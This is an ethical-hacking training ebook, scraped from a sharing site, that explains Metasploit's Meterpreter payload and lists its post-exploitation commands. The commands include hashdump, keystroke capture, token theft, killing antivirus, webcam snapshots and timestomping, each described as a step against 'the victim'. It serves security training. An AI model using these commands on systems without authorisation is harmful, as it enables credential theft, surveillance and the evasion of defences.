seculabs ebook - meterpreter cheatsheet commands

7/29/2019 Seculabs eBook - Meterpreter Cheatsheet Commands http://slidepdf.com/reader/full/seculabs-ebook-meterpreter-cheatsheet-commands 1/15

Upload: rifqi-multazam

Post on 14-Apr-2018


SECUGENIUS SECURITY SOLUTIONS 

--------------------------------------------------------------------------------------

(A UNIT OF HARKSH TECHNOLOGIES PVT. LTD)

Company Profile:

Secugenius Security Solutions is a Student Entrepreneurial Company started by 2 Social Student

Entrepreneurs in 2010 with an aim to make our country Cyber Crime Free. We at SECUGENIUS

are headquartered at Ludhiana, the Manchester of Punjab. The main activities of Secugenius

Security Solutions are providing training in Information Security and various professional courses.

Secugenius Security Solutions is an organization which believes in inventing and implementing new ideas to influence the technological minds of the youngsters.

Looking at the number of Cyber Crimes over the last many years, we at Secugenius Security

Solutions provide training on Ethical hacking & Cyber Security to students, IT Professionals, Bank

Employees, Police officials.

Secugenius conducts workshops in all parts of the country in various Colleges/institutions for the

benefit of the students & making them aware of the latest trends in technological era of the

Computer age. We believe in spreading knowledge to all the youngsters & growing minds of the

nation so that they could serve the nation with perfect skill-sets in the field of Cyber Crime

Investigation & Forensic Sciences

Secugenius provides various security solutions to its clients by securing their websites from cyber

attacks. We provide training to college students, graduates and professionals in various fields.

Education is delivered to students through two modes i.e. Regular mode and Distance mode which

are available as short term and long term courses.

In the workshops conducted by Secugenius, participants can claim to be trained by the highly

experienced & skilled corporate trainers from different parts of the nation. We believe in making

the base of students to be as strong as possible. All the modules have been designed in order to

provide students with specialized knowledge by specialized trainers.

This library was furnished, managed and funded by the Founders and Directors of Secugenius

Er. Harpreet Khattar & Er. Kshitij Adhlakha. The overall resource person for the content of 

the series of this Digital Library is Er. Chetan Soni - Sr. Security Specialist, Secugenius Security

Solutions.

This Online Digital Library has been initiated as a free resource & permanent

resource on specialization basis for every student of Team Secugenius.


Meterpreter Cheat sheet Commands

Product ID No: SG/ODL/13049

Founder & Director: Harpreet Khattar & Kshitij Adhlakha

Resource Person: Chetan Soni & Annuraj

Secugenius Security Solutions 

SCO-13A, Model Town Extn, Near Krishna Mandir,

Ludhiana-141002, Punjab  – India


www.secugenius.com , www.seculabs.in 


Meterpreter  – 

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime.

It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.

Meterpreter was originally written by skape for Metasploit 2.x; a common extension was merged for 3.x and is currently undergoing an overhaul for Metasploit 3.3.

The server portion is implemented in plain C and is now compiled with MSVC, making it somewhat portable. The client can be written in any language but Metasploit has a full-featured Ruby client API.

How Meterpreter Works 

i.  The target executes the initial stager. This is usually one of bind, reverse, findtag, passivex, etc.

ii.  The stager loads the DLL prefixed with Reflective. The Reflective stub handles the loading/injection of the DLL.

iii.  The Meterpreter core initializes, establishes a TLS/1.0 link over the socket and sends a GET. Metasploit receives this GET and configures the client.

iv.  Lastly, Meterpreter loads extensions. It will always load stdapi and will load priv if the module gives administrative rights. All of these extensions are loaded over TLS/1.0 using a TLV protocol. (Reference - http://www.offensive-security.com)

Since the Meterpreter provides a whole new environment, we will cover some of the basic Meterpreter commands to get you started and help you get familiar with this most powerful tool.

Throughout this EBook, almost every available Meterpreter command is covered.

For those that aren't covered, experimentation is the key to successful learning.


sysinfo

It shows the system build x86 or x64, language version, build...etc

run checkvm 

It checks to see if the victim is running a Virtual Machine or native.

route 

Dumps the routing table to the screen and shows how the subnet has been configured, etc.


run get_application_list 

This shows you the applications installed on the remote PC.

idletime

It shows how long the victim has not been active on the computer.

getpid

This gets the process ID and shows the process in which you are currently running.

getuid

This will show you the system identity and who you are running as, such as SYSTEM.


ps

This shows all the processes running on the victim as well as their PIDs.

getsystem 

This gives you local system privileges.

run get_env

This will give you a lot of info on the system.


execute -f cmd.exe -H -c

Open a command prompt on a hidden channel.

interact 1

Interact with a channel. "1" will be replaced with the channel you want to interact with.

download

This command will download the specified file.

"Example" download c:\\boot.ini

upload 

Upload files to the victim machine.


portfwd 

This command forwards a local port to a remote service.

run getgui -e

This will enable remote desktop on the victim.

run getcountermeasure

It checks the security configuration on the exploited machine and it can disable countermeasures such as AV, firewalls, etc.


run killav

It is designed to kill most AVs that are running as a service on the exploited machine.

run get_local_subnets

It is used to get the local subnet of the victim machine.

run remotewinenum 

It is designed to enumerate the target system with the wmic command.

load 

Load One or More Meterpreter Extensions.

channel 

Displays Info about Active Channels.

keyscan_start

Start Capturing Keystrokes

getdesktop

setdesktop

Change the Meterpreter's Current Desktop.

reboot 

Reboots the Remote Computer.


getprivs

 Attempt to Enable All Privileges Available to the Current Pro

reg

Interact with the Remote Registry

shell

Drop into a system shell.

shutdown 

Shuts Down the Remote Computer

steal_token

 Attempt to Steal an Impersonation Token from the Process

execute 

Execute a command.

info

Display info about active post module.

hashdump

Dumps the content of the SAM Database.

timestomp

Manipulates MACE Attributes

quit

Terminate the meterpreter session.

getwd

Print Working Directory


webcam_list

List webcams.

webcam_snap 

Take a snapshot from the specified webcam.

(Photo of Mr. Annuraj) 

mkdir

Make directory.


pwd

Print working directory.

drop_token

Relinquishes Any Active Impersonation Token

rmdir

Remove directory.

del

Delete file.

"Example" del passwords.txt